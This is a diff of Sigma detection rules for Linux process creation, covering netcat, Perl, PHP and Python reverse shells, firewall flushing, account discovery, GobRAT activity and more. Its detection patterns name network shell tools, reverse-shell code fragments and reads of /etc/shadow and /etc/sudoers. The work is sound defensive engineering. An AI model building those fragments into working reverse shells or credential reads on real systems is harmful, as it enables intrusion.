b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_install_suspicioua_packages.yml @@ -0,0 +1,47 @@ +title: Suspicious Package Installed - Linux +id: 700fb7e8-2981-401c-8430-be58e189e741 +status: test +description: Detects installation of suspicious packages using system installation utilities +references: + - https://gist.githubusercontent.com/MichaelKoczwara/12faba9c061c12b5814b711166de8c2f/raw/e2068486692897b620c25fde1ea258c8218fe3d3/history.txt +author: Nasreddine Bencherchali (Nextron Systems) +date: 2023/01/03 +tags: + - attack.defense_evasion + - attack.t1553.004 +logsource: + product: linux + category: process_creation +detection: + selection_tool_apt: + Image|endswith: + - '/apt' + - '/apt-get' + CommandLine|contains: 'install' + selection_tool_yum: + Image|endswith: '/yum' + CommandLine|contains: + - 'localinstall' + - 'install' + selection_tool_rpm: + Image|endswith: '/rpm' + CommandLine|contains: '-i' + selection_tool_dpkg: + Image|endswith: '/dpkg' + CommandLine|contains: + - '--install' + - '-i' + selection_keyword: + CommandLine|contains: + # Add more suspicious packages + - 'nmap' + - ' nc' + - 'netcat' + - 'wireshark' + - 'tshark' + - 'openconnect' + - 'proxychains' + condition: 1 of selection_tool_* and selection_keyword +falsepositives: + - Legitimate administration activities +level: medium diff --git a/src/main/resources/rules/linux/process_creation/proc_creation_lnx_iptables_flush_ufw.yml b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_iptables_flush_ufw.yml new file mode 100644 index 000000000..7c13288f2 --- /dev/null +++ b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_iptables_flush_ufw.yml @@ -0,0 +1,41 @@ +title: Flush Iptables Ufw Chain +id: 3be619f4-d9ec-4ea8-a173-18fdd01996ab +status: test +description: Detect use of iptables to flush all firewall rules, tables and chains and allow all network traffic +references: + - https://blogs.blackberry.com/ + - https://www.cyberciti.biz/tips/linux-iptables-how-to-flush-all-rules.html + - https://twitter.com/Joseliyo_Jstnk/status/1620131033474822144 +author: Joseliyo Sanchez, @Joseliyo_Jstnk +date: 2023/01/18 +tags: + - attack.defense_evasion + - attack.t1562.004 +logsource: + product: linux + category: process_creation +detection: + selection_img: + Image|endswith: + - '/iptables' + - '/xtables-legacy-multi' + - '/iptables-legacy-multi' + - '/ip6tables' + - '/ip6tables-legacy-multi' + selection_params: + CommandLine|contains: + - '-F' + - '-Z' + - '-X' + selection_ufw: + CommandLine|contains: + - 'ufw-logging-deny' + - 'ufw-logging-allow' + - 'ufw6-logging-deny' + - 'ufw6-logging-allow' + # - 'ufw-reject-output' + # - 'ufw-track-inputt' + condition: all of selection_* +falsepositives: + - Network administrators +level: medium diff --git a/src/main/resources/rules/linux/process_creation/proc_creation_lnx_kill_process.yml b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_kill_process.yml new file mode 100644 index 000000000..1ebfc0e5c --- /dev/null +++ b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_kill_process.yml @@ -0,0 +1,25 @@ +title: Terminate Linux Process Via Kill +id: 64c41342-6b27-523b-5d3f-c265f3efcdb3 +status: test +description: Detects usage of command line tools such as "kill", "pkill" or "killall" to terminate or signal a running process. +references: + - https://www.trendmicro.com/en_us/research/23/c/iron-tiger-sysupdate-adds-linux-targeting.html + - https://www.cyberciti.biz/faq/how-force-kill-process-linux/ +author: Tuan Le (NCSGroup) +date: 2023/03/16 +tags: + - attack.defense_evasion + - attack.t1562 +logsource: + product: linux + category: process_creation +detection: + selection: + Image|endswith: + - '/kill' + - '/pkill' + - '/killall' + condition: selection +falsepositives: + - Likely +level: low diff --git a/src/main/resources/rules/linux/process_creation/proc_creation_lnx_local_account.yml b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_local_account.yml index 2b1791a11..8bd382f44 100644 --- a/src/main/resources/rules/linux/process_creation/proc_creation_lnx_local_account.yml +++ b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_local_account.yml @@ -1,34 +1,39 @@ -title: Local System Accounts Discovery +title: Local System Accounts Discovery - Linux id: b45e3d6f-42c6-47d8-a478-df6bd6cf534c status: test -description: Detects enumeration of local systeam accounts -author: Alejandro Ortuno, oscd.community +description: Detects enumeration of local systeam accounts. This information can help adversaries determine which local accounts exist on a system to aid in follow-on behavior. references: - - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md + - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1087.001/T1087.001.md +author: Alejandro Ortuno, oscd.community date: 2020/10/08 -modified: 2021/11/27 +modified: 2022/11/27 +tags: + - attack.discovery + - attack.t1087.001 logsource: - category: process_creation - product: linux + category: process_creation + product: linux detection: - selection_1: - Image|endswith: '/lastlog' - selection_2: - CommandLine|contains: '''x:0:''' - selection_3: - Image|endswith: '/cat' - CommandLine|contains: - - '/etc/passwd' - - '/etc/sudoers' - selection_4: - Image|endswith: '/id' - selection_5: - Image|endswith: '/lsof' - CommandLine|contains: '-u' - condition: 1 of selection* + selection_1: + Image|endswith: '/lastlog' + selection_2: + CommandLine|contains: '''x:0:''' + selection_3: + Image|endswith: + - '/cat' + - '/head' + - '/tail' + - '/more' + CommandLine|contains: + - '/etc/passwd' + - '/etc/shadow' + - '/etc/sudoers' + selection_4: + Image|endswith: '/id' + selection_5: + Image|endswith: '/lsof' + CommandLine|contains: '-u' + condition: 1 of selection* falsepositives: - - Legitimate administration activities + - Legitimate administration activities level: low -tags: - - attack.discovery - - attack.t1087.001 diff --git a/src/main/resources/rules/linux/process_creation/proc_creation_lnx_local_groups.yml b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_local_groups.yml index 5ba646c21..3cfe8edcd 100644 --- a/src/main/resources/rules/linux/process_creation/proc_creation_lnx_local_groups.yml +++ b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_local_groups.yml @@ -1,25 +1,29 @@ -title: Local Groups Discovery +title: Local Groups Discovery - Linux id: 676381a6-15ca-4d73-a9c8-6a22e970b90d status: test -description: Detects enumeration of local system groups -author: Ömer Günal, Alejandro Ortuno, oscd.community +description: Detects enumeration of local system groups. Adversaries may attempt to find local system groups and permission settings references: - - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md + - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1069.001/T1069.001.md +author: Ömer Günal, Alejandro Ortuno, oscd.community date: 2020/10/11 -modified: 2021/11/27 +modified: 2022/11/27 +tags: + - attack.discovery + - attack.t1069.001 logsource: - category: process_creation - product: linux + category: process_creation + product: linux detection: - selection_1: - Image|endswith: '/groups' - selection_2: - Image|endswith: '/cat' - CommandLine|contains: '/etc/group' - condition: 1 of selection* + selection_1: + Image|endswith: '/groups' + selection_2: + Image|endswith: + - '/cat' + - '/head' + - '/tail' + - '/more' + CommandLine|contains: '/etc/group' + condition: 1 of selection* falsepositives: - - Legitimate administration activities + - Legitimate administration activities level: low -tags: - - attack.discovery - - attack.t1069.001 diff --git a/src/main/resources/rules/linux/process_creation/proc_creation_lnx_malware_gobrat_grep_payload_discovery.yml b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_malware_gobrat_grep_payload_discovery.yml new file mode 100644 index 000000000..5b618f296 --- /dev/null +++ b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_malware_gobrat_grep_payload_discovery.yml @@ -0,0 +1,28 @@ +title: Potential GobRAT File Discovery Via Grep +id: e34cfa0c-0a50-4210-9cb3-5632d08eb041 +status: experimental +description: Detects the use of grep to discover specific files created by the GobRAT malware +references: + - https://blogs.jpcert.or.jp/en/2023/05/gobrat.html + - https://www.virustotal.com/gui/file/60bcd645450e4c846238cf0e7226dc40c84c96eba99f6b2cffcd0ab4a391c8b3/detection + - https://www.virustotal.com/gui/file/3e44c807a25a56f4068b5b8186eee5002eed6f26d665a8b791c472ad154585d1/detection +author: Joseliyo Sanchez, @Joseliyo_Jstnk +date: 2023/06/02 +tags: + - attack.discovery + - attack.t1082 +logsource: + category: process_creation + product: linux +detection: + selection: + Image|endswith: '/grep' + CommandLine|contains: + - 'apached' + - 'frpc' + - 'sshd.sh' + - 'zone.arm' + condition: selection +falsepositives: + - Unknown +level: high diff --git a/src/main/resources/rules/linux/process_creation/proc_creation_lnx_mkfifo_named_pipe_creation.yml b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_mkfifo_named_pipe_creation.yml new file mode 100644 index 000000000..d60f1cb6e --- /dev/null +++ b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_mkfifo_named_pipe_creation.yml @@ -0,0 +1,21 @@ +title: Named Pipe Created Via Mkfifo +id: 9d779ce8-5256-4b13-8b6f-b91c602b43f4 +status: experimental +description: Detects the creation of a new named pipe using the "mkfifo" utility +references: + - https://dev.to/0xbf/use-mkfifo-to-create-named-pipe-linux-tips-5bbk + - https://www.mandiant.com/resources/blog/barracuda-esg-exploited-globally +author: Nasreddine Bencherchali (Nextron Systems) +date: 2023/06/16 +tags: + - attack.execution +logsource: + category: process_creation + product: linux +detection: + selection: + Image|endswith: '/mkfifo' + condition: selection +falsepositives: + - Unknown +level: low diff --git a/src/main/resources/rules/linux/process_creation/proc_creation_lnx_mkfifo_named_pipe_creation_susp_location.yml b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_mkfifo_named_pipe_creation_susp_location.yml new file mode 100644 index 000000000..4f773c3d9 --- /dev/null +++ b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_mkfifo_named_pipe_creation_susp_location.yml @@ -0,0 +1,26 @@ +title: Potentially Suspicious Named Pipe Created Via Mkfifo +id: 999c3b12-0a8c-40b6-8e13-dd7d62b75c7a +related: + - id: 9d779ce8-5256-4b13-8b6f-b91c602b43f4 + type: derived +status: experimental +description: Detects the creation of a new named pipe using the "mkfifo" utility in a potentially suspicious location +references: + - https://dev.to/0xbf/use-mkfifo-to-create-named-pipe-linux-tips-5bbk + - https://www.mandiant.com/resources/blog/barracuda-esg-exploited-globally +author: Nasreddine Bencherchali (Nextron Systems) +date: 2023/06/16 +tags: + - attack.execution +logsource: + category: process_creation + product: linux +detection: + selection: + Image|endswith: '/mkfifo' + # Note: Add more potentially suspicious locations + CommandLine|contains: ' /tmp/' + condition: selection +falsepositives: + - Unknown +level: medium diff --git a/src/main/resources/rules/linux/process_creation/proc_creation_lnx_mount_hidepid.yml b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_mount_hidepid.yml new file mode 100644 index 000000000..2629345c5 --- /dev/null +++ b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_mount_hidepid.yml @@ -0,0 +1,26 @@ +title: Mount Execution With Hidepid Parameter +id: ec52985a-d024-41e3-8ff6-14169039a0b3 +status: test +description: Detects execution of the "mount" command with "hidepid" parameter to make invisible processes to other users from the system +references: + - https://blogs.blackberry.com/ + - https://www.cyberciti.biz/faq/linux-hide-processes-from-other-users/ + - https://twitter.com/Joseliyo_Jstnk/status/1620131033474822144 +author: Joseliyo Sanchez, @Joseliyo_Jstnk +date: 2023/01/12 +tags: + - attack.credential_access + - attack.t1564 +logsource: + product: linux + category: process_creation +detection: + selection: + Image|endswith: '/mount' + CommandLine|contains|all: + - 'hidepid=2' + - ' -o ' + condition: selection +falsepositives: + - Unknown +level: medium diff --git a/src/main/resources/rules/linux/process_creation/proc_creation_lnx_netcat_reverse_shell.yml b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_netcat_reverse_shell.yml new file mode 100644 index 000000000..2e43b72af --- /dev/null +++ b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_netcat_reverse_shell.yml @@ -0,0 +1,59 @@ +title: Potential Netcat Reverse Shell Execution +id: 7f734ed0-4f47-46c0-837f-6ee62505abd9 +status: test +description: Detects execution of netcat with the "-e" flag followed by common shells. This could be a sign of a potential reverse shell setup. +references: + - https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet + - https://www.revshells.com/ + - https://www.hackingtutorials.org/networking/hacking-netcat-part-2-bind-reverse-shells/ + - https://www.infosecademy.com/netcat-reverse-shells/ + - https://man7.org/linux/man-pages/man1/ncat.1.html +author: '@d4ns4n_, Nasreddine Bencherchali (Nextron Systems)' +date: 2023/04/07 +tags: + - attack.execution + - attack.t1059 +logsource: + category: process_creation + product: linux +detection: + selection_nc: + Image|endswith: + - '/nc' + - '/ncat' + selection_flags: + CommandLine|contains: + - ' -c ' + - ' -e ' + selection_shell: + CommandLine|contains: + - ' ash' + - ' bash' + - ' bsh' + - ' csh' + - ' ksh' + - ' pdksh' + - ' sh' + - ' tcsh' + - '/bin/ash' + - '/bin/bash' + - '/bin/bsh' + - '/bin/csh' + - '/bin/ksh' + - '/bin/pdksh' + - '/bin/sh' + - '/bin/tcsh' + - '/bin/zsh' + - '$IFSash' + - '$IFSbash' + - '$IFSbsh' + - '$IFScsh' + - '$IFSksh' + - '$IFSpdksh' + - '$IFSsh' + - '$IFStcsh' + - '$IFSzsh' + condition: all of selection_* +falsepositives: + - Unlikely +level: high diff --git a/src/main/resources/rules/linux/process_creation/proc_creation_lnx_network_service_scanning.yml b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_network_service_scanning.yml deleted file mode 100644 index dff9dc956..000000000 --- a/src/main/resources/rules/linux/process_creation/proc_creation_lnx_network_service_scanning.yml +++ /dev/null @@ -1,31 +0,0 @@ -title: Linux Network Service Scanning -id: 3e102cd9-a70d-4a7a-9508-403963092f31 -status: experimental -description: Detects enumeration of local or remote network services. -author: Alejandro Ortuno, oscd.community -date: 2020/10/21 -modified: 2021/09/14 -references: - - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md -tags: - - attack.discovery - - attack.t1046 -logsource: - category: process_creation - product: linux - definition: 'Detect netcat and filter our listening mode' -detection: - netcat: - Image|endswith: - - '/nc' - - '/netcat' - network_scanning_tools: - Image|endswith: - - '/telnet' # could be wget, curl, ssh, many things. basically everything that is able to do network connection. consider fine tuning - - '/nmap' - netcat_listen_flag: - CommandLine|contains: 'l' - condition: (netcat and not netcat_listen_flag) or network_scanning_tools -falsepositives: - - Legitimate administration activities -level: low diff --git a/src/main/resources/rules/linux/process_creation/proc_creation_lnx_nohup.yml b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_nohup.yml index 1b8abaea7..dedce2fb1 100644 --- a/src/main/resources/rules/linux/process_creation/proc_creation_lnx_nohup.yml +++ b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_nohup.yml @@ -1,20 +1,23 @@ title: Nohup Execution id: e4ffe466-6ff8-48d4-94bd-e32d1a6061e2 -status: experimental +status: test description: Detects usage of nohup which could be leveraged by an attacker to keep a process running or break out from restricted environments -author: 'Christopher Peacock @SecurePeacock, SCYTHE @scythe_io' references: - - https://gtfobins.github.io/gtfobins/nohup/ - - https://en.wikipedia.org/wiki/Nohup - - https://www.computerhope.com/unix/unohup.htm + - https://gtfobins.github.io/gtfobins/nohup/ + - https://en.wikipedia.org/wiki/Nohup + - https://www.computerhope.com/unix/unohup.htm +author: 'Christopher Peacock @SecurePeacock, SCYTHE @scythe_io' date: 2022/06/06 +tags: + - attack.execution + - attack.t1059.004 logsource: - product: linux - category: process_creation + product: linux + category: process_creation detection: - selection: - Image|endswith: '/nohup' - condition: selection + selection: + Image|endswith: '/nohup' + condition: selection falsepositives: - - Administrators or installed processes that leverage nohup + - Administrators or installed processes that leverage nohup level: medium diff --git a/src/main/resources/rules/linux/process_creation/proc_creation_lnx_nohup_susp_execution.yml b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_nohup_susp_execution.yml new file mode 100644 index 000000000..5359bdca9 --- /dev/null +++ b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_nohup_susp_execution.yml @@ -0,0 +1,27 @@ +title: Suspicious Nohup Execution +id: 457df417-8b9d-4912-85f3-9dbda39c3645 +related: + - id: e4ffe466-6ff8-48d4-94bd-e32d1a6061e2 + type: derived +status: experimental +description: Detects execution of binaries located in potentially suspicious locations via "nohup" +references: + - https://blogs.jpcert.or.jp/en/2023/05/gobrat.html + - https://jstnk9.github.io/jstnk9/research/GobRAT-Malware/ + - https://www.virustotal.com/gui/file/60bcd645450e4c846238cf0e7226dc40c84c96eba99f6b2cffcd0ab4a391c8b3/detection + - https://www.virustotal.com/gui/file/3e44c807a25a56f4068b5b8186eee5002eed6f26d665a8b791c472ad154585d1/detection +author: Joseliyo Sanchez, @Joseliyo_Jstnk +date: 2023/06/02 +tags: + - attack.execution +logsource: + product: linux + category: process_creation +detection: + selection: + Image|endswith: '/nohup' + CommandLine|contains: '/tmp/' + condition: selection +falsepositives: + - Unknown +level: high diff --git a/src/main/resources/rules/linux/process_creation/proc_creation_lnx_omigod_scx_runasprovider_executescript.yml b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_omigod_scx_runasprovider_executescript.yml index 90ed0cf16..7711f5db5 100644 --- a/src/main/resources/rules/linux/process_creation/proc_creation_lnx_omigod_scx_runasprovider_executescript.yml +++ b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_omigod_scx_runasprovider_executescript.yml @@ -1,9 +1,18 @@ title: OMIGOD SCX RunAsProvider ExecuteScript id: 6eea1bf6-f8d2-488a-a742-e6ef6c1b67db -status: experimental -description: Rule to detect the use of the SCX RunAsProvider ExecuteScript to execute any UNIX/Linux script using the /bin/sh shell. Script being executed gets created as a temp file in /tmp folder with a scx* prefix. Then it is invoked from the following directory /etc/opt/microsoft/scx/conf/tmpdir/. The file in that directory has the same prefix scx*. SCXcore, started as the Microsoft Operations Manager UNIX/Linux Agent, is now used in a host of products including Microsoft Operations Manager. Microsoft Azure, and Microsoft Operations Management Suite. -date: 2021/10/15 +status: test +description: | + Rule to detect the use of the SCX RunAsProvider ExecuteScript to execute any UNIX/Linux script using the /bin/sh shell. + Script being executed gets created as a temp file in /tmp folder with a scx* prefix. + Then it is invoked from the following directory /etc/opt/microsoft/scx/conf/tmpdir/. + The file in that directory has the same prefix scx*. SCXcore, started as the Microsoft Operations Manager UNIX/Linux Agent, is now used in a host of products including + Microsoft Operations Manager, Microsoft Azure, and Microsoft Operations Management Suite. +references: + - https://www.wiz.io/blog/omigod-critical-vulnerabilities-in-omi-azure + - https://github.com/Azure/Azure-Sentinel/pull/3059 author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC +date: 2021/10/15 +modified: 2022/10/05 tags: - attack.privilege_escalation - attack.initial_access @@ -11,17 +20,13 @@ tags: - attack.t1068 - attack.t1190 - attack.t1203 -references: - - https://www.wiz.io/blog/omigod-critical-vulnerabilities-in-omi-azure - - https://github.com/Azure/Azure-Sentinel/pull/3059 - - https://github.com/SigmaHQ/sigma/blob/master/rules/linux/auditd/lnx_auditd_omigod_scx_runasprovider_executescript.yml logsource: - product: linux - category: process_creation + product: linux + category: process_creation detection: selection: User: root - LogonId: '0' + LogonId: 0 CurrentDirectory: '/var/opt/microsoft/scx/tmp' CommandLine|contains: '/etc/opt/microsoft/scx/conf/tmpdir/scx' condition: selection diff --git a/src/main/resources/rules/linux/process_creation/proc_creation_lnx_omigod_scx_runasprovider_executeshellcommand.yml b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_omigod_scx_runasprovider_executeshellcommand.yml index 50d18a1dd..5dbd85298 100644 --- a/src/main/resources/rules/linux/process_creation/proc_creation_lnx_omigod_scx_runasprovider_executeshellcommand.yml +++ b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_omigod_scx_runasprovider_executeshellcommand.yml @@ -1,9 +1,16 @@ title: OMIGOD SCX RunAsProvider ExecuteShellCommand id: 21541900-27a9-4454-9c4c-3f0a4240344a -status: experimental -description: Rule to detect the use of the SCX RunAsProvider Invoke_ExecuteShellCommand to execute any UNIX/Linux command using the /bin/sh shell. SCXcore, started as the Microsoft Operations Manager UNIX/Linux Agent, is now used in a host of products including Microsoft Operations Manager. Microsoft Azure, and Microsoft Operations Management Suite. -date: 2021/10/15 +status: test +description: | + Rule to detect the use of the SCX RunAsProvider Invoke_ExecuteShellCommand to execute any UNIX/Linux command using the /bin/sh shell. + SCXcore, started as the Microsoft Operations Manager UNIX/Linux Agent, is now used in a host of products including + Microsoft Operations Manager, Microsoft Azure, and Microsoft Operations Management Suite. +references: + - https://www.wiz.io/blog/omigod-critical-vulnerabilities-in-omi-azure + - https://github.com/Azure/Azure-Sentinel/pull/3059 author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC +date: 2021/10/15 +modified: 2022/10/05 tags: - attack.privilege_escalation - attack.initial_access @@ -11,17 +18,13 @@ tags: - attack.t1068 - attack.t1190 - attack.t1203 -references: - - https://www.wiz.io/blog/omigod-critical-vulnerabilities-in-omi-azure - - https://github.com/Azure/Azure-Sentinel/pull/3059 - - https://github.com/SigmaHQ/sigma/blob/master/rules/linux/auditd/lnx_auditd_omigod_scx_runasprovider_executeshellcommand.yml logsource: - product: linux - category: process_creation + product: linux + category: process_creation detection: selection: User: root - LogonId: '0' + LogonId: 0 CurrentDirectory: '/var/opt/microsoft/scx/tmp' CommandLine|contains: '/bin/sh' condition: selection diff --git a/src/main/resources/rules/linux/process_creation/proc_creation_lnx_perl_reverse_shell.yml b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_perl_reverse_shell.yml new file mode 100644 index 000000000..54d39c730 --- /dev/null +++ b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_perl_reverse_shell.yml @@ -0,0 +1,31 @@ +title: Potential Perl Reverse Shell Execution +id: 259df6bc-003f-4306-9f54-4ff1a08fa38e +status: test +description: Detects execution of the perl binary with the "-e" flag and common strings related to potential reverse shell activity +references: + - https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet + - https://www.revshells.com/ +author: '@d4ns4n_, Nasreddine Bencherchali (Nextron Systems)' +date: 2023/04/07 +tags: + - attack.execution +logsource: + category: process_creation + product: linux +detection: + selection_img: + Image|endswith: '/perl' + CommandLine|contains: ' -e ' + selection_content: + - CommandLine|contains|all: + - 'fdopen(' + - '::Socket::INET' + - CommandLine|contains|all: + - 'Socket' + - 'connect' + - 'open' + - 'exec' + condition: all of selection_* +falsepositives: + - Unlikely +level: high diff --git a/src/main/resources/rules/linux/process_creation/proc_creation_lnx_php_reverse_shell.yml b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_php_reverse_shell.yml new file mode 100644 index 000000000..4dc456108 --- /dev/null +++ b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_php_reverse_shell.yml @@ -0,0 +1,36 @@ +title: Potential PHP Reverse Shell +id: c6714a24-d7d5-4283-a36b-3ffd091d5f7e +status: test +description: | + Detects usage of the PHP CLI with the "-r" flag which allows it to run inline PHP code. The rule looks for calls to the "fsockopen" function which allows the creation of sockets. + Attackers often leverage this in combination with functions such as "exec" or "fopen" to initiate a reverse shell connection. +references: + - https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet + - https://www.revshells.com/ +author: '@d4ns4n_' +date: 2023/04/07 +tags: + - attack.execution +logsource: + category: process_creation + product: linux +detection: + selection: + Image|contains: '/php' + CommandLine|contains|all: + - ' -r ' + - 'fsockopen' + CommandLine|contains: + - 'ash' + - 'bash' + - 'bsh' + - 'csh' + - 'ksh' + - 'pdksh' + - 'sh' + - 'tcsh' + - 'zsh' + condition: selection +falsepositives: + - Unknown +level: high diff --git a/src/main/resources/rules/linux/process_creation/proc_creation_lnx_process_discovery.yml b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_process_discovery.yml index 3dd32ec70..f61dbffc9 100644 --- a/src/main/resources/rules/linux/process_creation/proc_creation_lnx_process_discovery.yml +++ b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_process_discovery.yml @@ -1,24 +1,26 @@ title: Process Discovery id: 4e2f5868-08d4-413d-899f-dc2f1508627b status: stable -description: Detects process discovery commands +description: | + Detects process discovery commands. Adversaries may attempt to get information about running processes on a system. + Information obtained could be used to gain an understanding of common software/applications running on systems within the network +references: + - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1057/T1057.md author: Ömer Günal, oscd.community date: 2020/10/06 -modified: 2021/08/14 -references: - - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1057/T1057.md +modified: 2022/07/07 +tags: + - attack.discovery + - attack.t1057 logsource: product: linux category: process_creation detection: selection: Image|endswith: - - '/ps' - - '/top' + - '/ps' + - '/top' condition: selection falsepositives: - Legitimate administration activities level: informational -tags: - - attack.discovery - - attack.t1057 diff --git a/src/main/resources/rules/linux/process_creation/proc_creation_lnx_proxy_connection.yml b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_proxy_connection.yml new file mode 100644 index 000000000..767070986 --- /dev/null +++ b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_proxy_connection.yml @@ -0,0 +1,24 @@ +title: Connection Proxy +id: 72f4ab3f-787d-495d-a55d-68c2ff46cf4c +status: test +description: Detects setting proxy configuration +references: + - https://attack.mitre.org/techniques/T1090/ +author: Ömer Günal +date: 2020/06/17 +modified: 2022/10/05 +tags: + - attack.defense_evasion + - attack.t1090 +logsource: + product: linux + category: process_creation +detection: + selection: + CommandLine|contains: + - 'http_proxy=' + - 'https_proxy=' + condition: selection +falsepositives: + - Legitimate administration activities +level: low diff --git a/src/main/resources/rules/linux/process_creation/proc_creation_lnx_python_pty_spawn.yml b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_python_pty_spawn.yml index b56b56825..add5b3a11 100644 --- a/src/main/resources/rules/linux/process_creation/proc_creation_lnx_python_pty_spawn.yml +++ b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_python_pty_spawn.yml @@ -1,11 +1,15 @@ title: Python Spawning Pretty TTY id: c4042d54-110d-45dd-a0e1-05c47822c937 +related: + - id: 32e62bc7-3de0-4bb1-90af-532978fe42c0 + type: similar status: experimental -description: Detects python spawning a pretty tty -author: Nextron Systems -date: 2022/06/03 +description: Detects python spawning a pretty tty which could be indicative of potential reverse shell activity references: - https://www.volexity.com/blog/2022/06/02/zero-day-exploitation-of-atlassian-confluence/ +author: Nextron Systems +date: 2022/06/03 +modified: 2023/06/16 tags: - attack.execution - attack.t1059 @@ -13,17 +17,21 @@ logsource: category: process_creation product: linux detection: - selection_image: - Image|contains: - - '/python2.' # python image is always of the form ../python3.10; ../python is just a symlink - - '/python3.' - selection_cli1: + selection_img: + - Image|endswith: + - '/python' + - '/python2' + - '/python3' + - Image|contains: + - '/python2.' # python image is always of the form ../python3.10; ../python is just a symlink + - '/python3.' + selection_cli_1: CommandLine|contains|all: - 'import pty' - '.spawn(' - selection_cli2: + selection_cli_2: CommandLine|contains: 'from pty import spawn' - condition: selection_image and 1 of selection_cli* + condition: selection_img and 1 of selection_cli_* falsepositives: - Unknown level: high diff --git a/src/main/resources/rules/linux/process_creation/proc_creation_lnx_python_reverse_shell.yml b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_python_reverse_shell.yml new file mode 100644 index 000000000..b138ebc9e --- /dev/null +++ b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_python_reverse_shell.yml @@ -0,0 +1,30 @@ +title: Potential Python Reverse Shell +id: 32e62bc7-3de0-4bb1-90af-532978fe42c0 +related: + - id: c4042d54-110d-45dd-a0e1-05c47822c937 + type: similar +status: test +description: Detects executing python with keywords related to network activity that could indicate a potential reverse shell +references: + - https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet + - https://www.revshells.com/ +author: '@d4ns4n_, Nasreddine Bencherchali (Nextron Systems)' +date: 2023/04/24 +tags: + - attack.execution +logsource: + category: process_creation + product: linux +detection: + selection: + Image|contains: 'python' + CommandLine|contains|all: + - ' -c ' + - 'import' + - 'pty' + - 'spawn(' + - '.connect' + condition: selection +falsepositives: + - Unknown +level: high diff --git a/src/main/resources/rules/linux/process_creation/proc_creation_lnx_remote_access_tools_teamviewer_incoming_connection.yml b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_remote_access_tools_teamviewer_incoming_connection.yml new file mode 100644 index 000000000..27c08b20d --- /dev/null +++ b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_remote_access_tools_teamviewer_incoming_connection.yml @@ -0,0 +1,30 @@ +title: Remote Access Tool - Team Viewer Session Started On Linux Host +id: 1f6b8cd4-3e60-47cc-b282-5aa1cbc9182d +related: + - id: ab70c354-d9ac-4e11-bbb6-ec8e3b153357 + type: similar + - id: f459ccb4-9805-41ea-b5b2-55e279e2424a + type: similar +status: experimental +description: | + Detects the command line executed when TeamViewer starts a session started by a remote host. + Once a connection has been started, an investigator can verify the connection details by viewing the "incoming_connections.txt" log file in the TeamViewer folder. +references: + - Internal Research +author: Josh Nickels, Qi Nan +date: 2024/03/11 +tags: + - attack.initial_access + - attack.t1133 +logsource: + category: process_creation + product: linux +detection: + selection: + ParentImage|endswith: '/TeamViewer_Service' + Image|endswith: '/TeamViewer_Desktop' + CommandLine|endswith: '/TeamViewer_Desktop --IPCport 5939 --Module 1' + condition: selection +falsepositives: + - Legitimate usage of TeamViewer +level: low diff --git a/src/main/resources/rules/linux/process_creation/proc_creation_lnx_remote_system_discovery.yml b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_remote_system_discovery.yml index c54f9d6f2..9faab9fe4 100644 --- a/src/main/resources/rules/linux/process_creation/proc_creation_lnx_remote_system_discovery.yml +++ b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_remote_system_discovery.yml @@ -2,45 +2,45 @@ title: Linux Remote System Discovery id: 11063ec2-de63-4153-935e-b1a8b9e616f1 status: test description: Detects the enumeration of other remote systems. -author: Alejandro Ortuno, oscd.community references: - - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1018/T1018.md + - 